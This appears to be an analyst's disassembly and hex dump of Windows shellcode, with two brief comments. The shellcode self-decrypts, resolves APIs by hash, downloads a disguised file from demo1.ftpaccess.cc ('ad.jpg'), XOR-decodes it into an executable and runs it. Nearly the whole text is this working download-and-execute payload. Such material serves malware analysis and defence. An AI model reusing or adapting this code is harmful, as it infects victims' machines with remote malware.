self-decrypt:
00000000 90 nop
00000001 90 nop
00000002 EB19 jmp short 0x1d
00000004 5B pop ebx
00000005 4B dec ebx
00000006 90 nop
00000007 33C9 xor ecx,ecx
00000009 90 nop
0000000A 807B01E9 cmp byte [ebx+0x1],0xe9
0000000E 7501 jnz 0x11
00000010 C3 ret
00000011 66B97B04 mov cx,0x47b
00000015 80340BD8 xor byte [ebx+ecx],0xd8
00000019 E2FA loop 0x15
0000001B EB05 jmp short 0x22
0000001D E8E2FFFFFF call 0x4
entry:
00000022 E9E1030000 jmp 0x408
00000027 5F pop edi
00000028 64A130000000 mov eax,[fs:0x30]
0000002E 8B400C mov eax,[eax+0xc]
00000031 8B701C mov esi,[eax+0x1c]
00000034 AD lodsd
00000035 8B6808 mov ebp,[eax+0x8]
00000038 8BF7 mov esi,edi
0000003A 6A0F push byte +0xf
0000003C 59 pop ecx
0000003D E881030000 call 0x3c3
00000042 90 nop
00000043 E2F8 loop 0x3d
00000045 6833320000 push dword 0x3233
0000004A 6855736572 push dword 0x72657355
0000004F 54 push esp
00000050 8B460C mov eax,[esi+0xc]
00000053 E8EF020000 call 0x347
00000058 8BE8 mov ebp,eax
0000005A 6A01 push byte +0x1
0000005C 59 pop ecx
0000005D E861030000 call 0x3c3
00000062 E2F9 loop 0x5d
00000064 686F6E0000 push dword 0x6e6f
00000069 6875726C6D push dword 0x6d6c7275
0000006E 54 push esp
0000006F 8B460C mov eax,[esi+0xc]
00000072 E8D0020000 call 0x347
00000077 8BE8 mov ebp,eax
00000079 6A01 push byte +0x1
0000007B 59 pop ecx
0000007C E842030000 call 0x3c3
00000081 E2F9 loop 0x7c
00000083 686C333200 push dword 0x32336c
00000088 687368656C push dword 0x6c656873
0000008D 54 push esp
0000008E 8B460C mov eax,[esi+0xc]
00000091 E8B1020000 call 0x347
00000096 8BE8 mov ebp,eax
00000098 6A01 push byte +0x1
0000009A 59 pop ecx
0000009B E823030000 call 0x3c3
000000A0 E2F9 loop 0x9b
000000A2 81EC00010000 sub esp,0x100
000000A8 8BDC mov ebx,esp
000000AA 81C380000000 add ebx,0x80
000000B0 6A00 push byte +0x0
000000B2 6A1A push byte +0x1a
000000B4 53 push ebx
000000B5 6A00 push byte +0x0
000000B7 FF5644 call near [esi+0x44]
000000BA 33C0 xor eax,eax
000000BC 40 inc eax
000000BD 803C0300 cmp byte [ebx+eax],0x0
000000C1 75F9 jnz 0xbc
000000C3 898690000000 mov [esi+0x90],eax
000000C9 C704035C612E65 mov dword [ebx+eax],0x652e615c
000000D0 C744030478650000 mov dword [ebx+eax+0x4],0x6578
000000D8 33C9 xor ecx,ecx
000000DA 51 push ecx
000000DB 51 push ecx
000000DC 53 push ebx
000000DD 57 push edi
000000DE 51 push ecx
000000DF 33C0 xor eax,eax
000000E1 8B4640 mov eax,[esi+0x40]
000000E4 E85E020000 call 0x347
000000E9 83F800 cmp eax,byte +0x0
000000EC 0F857F010000 jnz near 0x271
000000F2 6A00 push byte +0x0
000000F4 6A00 push byte +0x0
000000F6 6A03 push byte +0x3
000000F8 6A00 push byte +0x0
000000FA 6A02 push byte +0x2
000000FC 68000000C0 push dword 0xc0000000
00000101 53 push ebx
00000102 8B4624 mov eax,[esi+0x24]
00000105 E83D020000 call 0x347
0000010A 83F8FF cmp eax,byte -0x1
0000010D 0F845E010000 jz near 0x271
00000113 894660 mov [esi+0x60],eax
00000116 6A00 push byte +0x0
00000118 50 push eax
00000119 FF5628 call near [esi+0x28]
0000011C 894664 mov [esi+0x64],eax
0000011F 8B8690000000 mov eax,[esi+0x90]
00000125 C704035C622E65 mov dword [ebx+eax],0x652e625c
0000012C C744030478650000 mov dword [ebx+eax+0x4],0x6578
00000134 6A00 push byte +0x0
00000136 6A00 push byte +0x0
00000138 6A02 push byte +0x2
0000013A 6A00 push byte +0x0
0000013C 6A00 push byte +0x0
0000013E 6800000040 push dword 0x40000000
00000143 53 push ebx
00000144 8B4624 mov eax,[esi+0x24]
00000147 E8FB010000 call 0x347
0000014C 83F8FF cmp eax,byte -0x1
0000014F 0F841C010000 jz near 0x271
00000155 898684000000 mov [esi+0x84],eax
0000015B 899E8C000000 mov [esi+0x8c],ebx
00000161 8B4660 mov eax,[esi+0x60]
00000164 6A00 push byte +0x0
00000166 6A00 push byte +0x0
00000168 6A00 push byte +0x0
0000016A 8B4660 mov eax,[esi+0x60]
0000016D 50 push eax
0000016E FF5638 call near [esi+0x38]
00000171 C7467000000000 mov dword [esi+0x70],0x0
00000178 C7467400000000 mov dword [esi+0x74],0x0
0000017F 81C700020000 add edi,0x200
00000185 33DB xor ebx,ebx
00000187 8B5E64 mov ebx,[esi+0x64]
0000018A 6A00 push byte +0x0
0000018C 8D4670 lea eax,[esi+0x70]
0000018F 50 push eax
00000190 6800040000 push dword 0x400
00000195 57 push edi
00000196 FF7660 push dword [esi+0x60]
00000199 FF5604 call near [esi+0x4]
0000019C 33C9 xor ecx,ecx
0000019E B900040000 mov ecx,0x400
000001A3 807C0FFF95 cmp byte [edi+ecx-0x1],0x95
000001A8 740C jz 0x1b6
000001AA 807C0FFF00 cmp byte [edi+ecx-0x1],0x0
000001AF 7405 jz 0x1b6
000001B1 80740FFF95 xor byte [edi+ecx-0x1],0x95
000001B6 E2EB loop 0x1a3
000001B8 8BC3 mov eax,ebx
000001BA 2D00040000 sub eax,0x400
000001BF 83F800 cmp eax,byte +0x0
000001C2 7F03 jg 0x1c7
000001C4 895E70 mov [esi+0x70],ebx
000001C7 6A00 push byte +0x0
000001C9 8D4674 lea eax,[esi+0x74]
000001CC 50 push eax
000001CD FF7670 push dword [esi+0x70]
000001D0 57 push edi
000001D1 FFB684000000 push dword [esi+0x84]
000001D7 FF5630 call near [esi+0x30]
000001DA 81EB00040000 sub ebx,0x400
000001E0 83FB00 cmp ebx,byte +0x0
000001E3 7FA5 jg 0x18a
000001E5 FF7660 push dword [esi+0x60]
000001E8 FF5634 call near [esi+0x34]
000001EB FFB684000000 push dword [esi+0x84]
000001F1 FF5634 call near [esi+0x34]
000001F4 8B8690000000 mov eax,[esi+0x90]
000001FA 8B9E8C000000 mov ebx,[esi+0x8c]
00000200 C704035C612E65 mov dword [ebx+eax],0x652e615c
00000207 53 push ebx
00000208 FF562C call near [esi+0x2c]
0000020B 8BBE8C000000 mov edi,[esi+0x8c]
00000211 8B8690000000 mov eax,[esi+0x90]
00000217 C704075C622E65 mov dword [edi+eax],0x652e625c
0000021E 81EC00010000 sub esp,0x100
00000224 8BDC mov ebx,esp
00000226 6800010000 push dword 0x100
0000022B 53 push ebx
0000022C 6800010000 push dword 0x100
00000231 57 push edi
00000232 6A00 push byte +0x0
00000234 6A00 push byte +0x0
00000236 FF561C call near [esi+0x1c]
00000239 8BFB mov edi,ebx
0000023B 33C0 xor eax,eax
0000023D 33DB xor ebx,ebx
0000023F 81EC00020000 sub esp,0x200
00000245 8BCC mov ecx,esp
00000247 83F854 cmp eax,byte +0x54
0000024A 7D08 jnl 0x254
0000024C 891C01 mov [ecx+eax],ebx
0000024F 83C004 add eax,byte +0x4
00000252 EBF3 jmp short 0x247
00000254 8BCC mov ecx,esp
00000256 8BD9 mov ebx,ecx
00000258 83C310 add ebx,byte +0x10
0000025B 33C0 xor eax,eax
0000025D 50 push eax
0000025E 51 push ecx
0000025F 53 push ebx
00000260 50 push eax
00000261 50 push eax
00000262 50 push eax
00000263 50 push eax
00000264 50 push eax
00000265 50 push eax
00000266 57 push edi
00000267 50 push eax
00000268 50 push eax
00000269 8B4608 mov eax,[esi+0x8]
0000026C E8F7000000 call 0x368
00000271 8B7E3C mov edi,[esi+0x3c]
00000274 E834010000 call 0x3ad
00000279 E837000000 call 0x2b5
0000027E 6863767700 push dword 0x777663
00000283 687368646F push dword 0x6f646873
00000288 54 push esp
00000289 8B460C mov eax,[esi+0xc]
0000028C E8B6000000 call 0x347
00000291 89463C mov [esi+0x3c],eax
00000294 64A104000000 mov eax,[fs:0x4]
0000029A 8DA060FFFFFF lea esp,[eax+0xffffff60]
000002A0 6A65 push byte +0x65
000002A2 FF763C push dword [esi+0x3c]
000002A5 8B4610 mov eax,[esi+0x10]
000002A8 E89A000000 call 0x347
000002AD 33DB xor ebx,ebx
000002AF 53 push ebx
000002B0 53 push ebx
000002B1 53 push ebx
000002B2 53 push ebx
000002B3 FFD0 call eax
000002B5 E8E5000000 call 0x39f
000002BA 81EC00010000 sub esp,0x100
000002C0 8BFC mov edi,esp
000002C2 83C704 add edi,byte +0x4
000002C5 C7073274910C mov dword [edi],0xc917432
000002CB C747046389D14F mov dword [edi+0x4],0x4fd18963
000002D2 C74708A06597CB mov dword [edi+0x8],0xcb9765a0
000002D9 C7470C5140BA7F mov dword [edi+0xc],0x7fba4051
000002E0 C747103E1DB639 mov dword [edi+0x10],0x39b61d3e
000002E7 C74714B869D41B mov dword [edi+0x14],0x1bd469b8
000002EE C74718BE7F66A0 mov dword [edi+0x18],0xa0667fbe
000002F5 C7471CFCA937AD mov dword [edi+0x1c],0xad37a9fc
000002FC C74720980A10F8 mov dword [edi+0x20],0xf8100a98
00000303 64A130000000 mov eax,[fs:0x30]
00000309 8B400C mov eax,[eax+0xc]
0000030C 8B701C mov esi,[eax+0x1c]
0000030F AD lodsd
00000310 8B6808 mov ebp,[eax+0x8]
00000313 8BF7 mov esi,edi
00000315 895664 mov [esi+0x64],edx
00000318 6A04 push byte +0x4
0000031A 59 pop ecx
0000031B E8A3000000 call 0x3c3
00000320 90 nop
00000321 E2F8 loop 0x31b
00000323 6833320000 push dword 0x3233
00000328 6855736572 push dword 0x72657355
0000032D 54 push esp
0000032E 8B06 mov eax,[esi]
00000330 E812000000 call 0x347
00000335 8BE8 mov ebp,eax
00000337 6A05 push byte +0x5
00000339 59 pop ecx
0000033A E884000000 call 0x3c3
0000033F E2F9 loop 0x33a
00000341 33FF xor edi,edi
00000343 57 push edi
00000344 FF5604 call near [esi+0x4]
00000347 8038E8 cmp byte [eax],0xe8
0000034A 8038E9 cmp byte [eax],0xe9
0000034D 7511 jnz 0x360
0000034F 81780590909090 cmp dword [eax+0x5],0x90909090
00000356 7408 jz 0x360
00000358 8BFF mov edi,edi
0000035A 55 push ebp
0000035B 8BEC mov ebp,esp
0000035D 8D4005 lea eax,[eax+0x5]
00000360 FFE0 jmp eax
00000362 E838000000 call 0x39f
00000367 C3 ret
00000368 8038E8 cmp byte [eax],0xe8
0000036B 8038E9 cmp byte [eax],0xe9
0000036E 7511 jnz 0x381
00000370 81780590909090 cmp dword [eax+0x5],0x90909090
00000377 74E7 jz 0x360
00000379 68080A0000 push dword 0xa08
0000037E 8D4005 lea eax,[eax+0x5]
00000381 FFE0 jmp eax
00000383 E817000000 call 0x39f
00000388 C3 ret
00000389 E811000000 call 0x39f
0000038E B811010480 mov eax,0x80040111
00000393 C20C00 ret 0xc
00000396 EB02 jmp short 0x39a
00000398 58 pop eax
00000399 C3 ret
0000039A E8F9FFFFFF call 0x398
0000039F 5B pop ebx
000003A0 C607B8 mov byte [edi],0xb8
000003A3 895F01 mov [edi+0x1],ebx
000003A6 66C74705FFE0 mov word [edi+0x5],0xe0ff
000003AC C3 ret
000003AD 53 push ebx
000003AE 8BDC mov ebx,esp
000003B0 53 push ebx
000003B1 6A40 push byte +0x40
000003B3 6800100000 push dword 0x1000
000003B8 57 push edi
000003B9 8B4620 mov eax,[esi+0x20]
000003BC E886FFFFFF call 0x347
000003C1 58 pop eax
000003C2 C3 ret
000003C3 51 push ecx
000003C4 56 push esi
000003C5 8B753C mov esi,[ebp+0x3c]
000003C8 8B742E78 mov esi,[esi+ebp+0x78]
000003CC 03F5 add esi,ebp
000003CE 56 push esi
000003CF 8B7620 mov esi,[esi+0x20]
000003D2 03F5 add esi,ebp
000003D4 33C9 xor ecx,ecx
000003D6 49 dec ecx
000003D7 41 inc ecx
000003D8 AD lodsd
000003D9 03C5 add eax,ebp
000003DB 33DB xor ebx,ebx
000003DD 0FBE10 movsx edx,byte [eax]
000003E0 3AD6 cmp dl,dh
000003E2 7408 jz 0x3ec
000003E4 C1CB07 ror ebx,0x7
000003E7 03DA add ebx,edx
000003E9 40 inc eax
000003EA EBF1 jmp short 0x3dd
000003EC 3B1F cmp ebx,[edi]
000003EE 75E7 jnz 0x3d7
000003F0 5E pop esi
000003F1 8B5E24 mov ebx,[esi+0x24]
000003F4 03DD add ebx,ebp
000003F6 668B0C4B mov cx,[ebx+ecx*2]
000003FA 8B5E1C mov ebx,[esi+0x1c]
000003FD 03DD add ebx,ebp
000003FF 8B048B mov eax,[ebx+ecx*4]
00000402 03C5 add eax,ebp
00000404 AB stosd
00000405 5E pop esi
00000406 59 pop ecx
00000407 C3 ret
00000408 E81AFCFFFF call 0x27
0000040D B2F2 mov dl,0xf2
0000040F E2F4 loop 0x405
00000411 B236 mov dl,0x36
00000413 0F13F0 umov esi,eax
00000416 48 dec eax
00000417 7B3D jpo 0x456
00000419 3274910C xor dh,[ecx+edx*4+0xc]
0000041D 85DF test edi,ebx
0000041F AF scasd
00000420 BB6389D14F mov ebx,0x4fd18963
00000425 51 push ecx
00000426 40 inc eax
00000427 BA7F079222 mov edx,0x2292077f
0000042C 701E jo 0x44c
(this section is probably junk)
0000042E A4 movsb
0000042F 64EF fs out dx,eax
00000431 93 xchg eax,ebx
00000432 32E4 xor ah,ah
00000434 94 xchg eax,esp
00000435 8E13 mov ss,[ebx]
00000437 0AAC7939E698C4 or ch,[ecx+edi*2+0xc498e639]
0000043E 8D1F lea ebx,[edi]
00000440 7457 jz 0x499
00000442 660DFF43 or ax,0x43ff
00000446 BEACDB980A mov esi,0xa98dbac
0000044B 10F8 adc al,bh
0000044D 80D6AF adc dh,0xaf
00000450 9AFB5315666874 call 0x7468:0x661553fb
(since there's a jump to 44c, an alternate decode here, which isn't much help)
0000044C F8 clc
0000044D 80D6AF adc dh,0xaf
00000450 9AFB5315666874 call 0x7468:0x661553fb
00000410 f4 b2 36 0f 13 f0 48 7b 3d 32 74 91 0c 85 df af |..6...H{=2t.....|
00000420 bb 63 89 d1 4f 51 40 ba 7f 07 92 22 70 1e a4 64 |.c..OQ@...."p..d|
00000430 ef 93 32 e4 94 8e 13 0a ac 79 39 e6 98 c4 8d 1f |..2......y9.....|
00000440 74 57 66 0d ff 43 be ac db 98 0a 10 f8 80 d6 af |tWf..C..........|
00000450 9a fb 53 15 66 68 74 74 70 3a 2f 2f 64 65 6d 6f |..S.fhttp://demo|
00000460 31 2e 66 74 70 61 63 63 65 73 73 2e 63 63 2f 64 |1.ftpaccess.cc/d|
00000470 65 6d 6f 2f 61 64 2e 6a 70 67 00 |emo/ad.jpg. |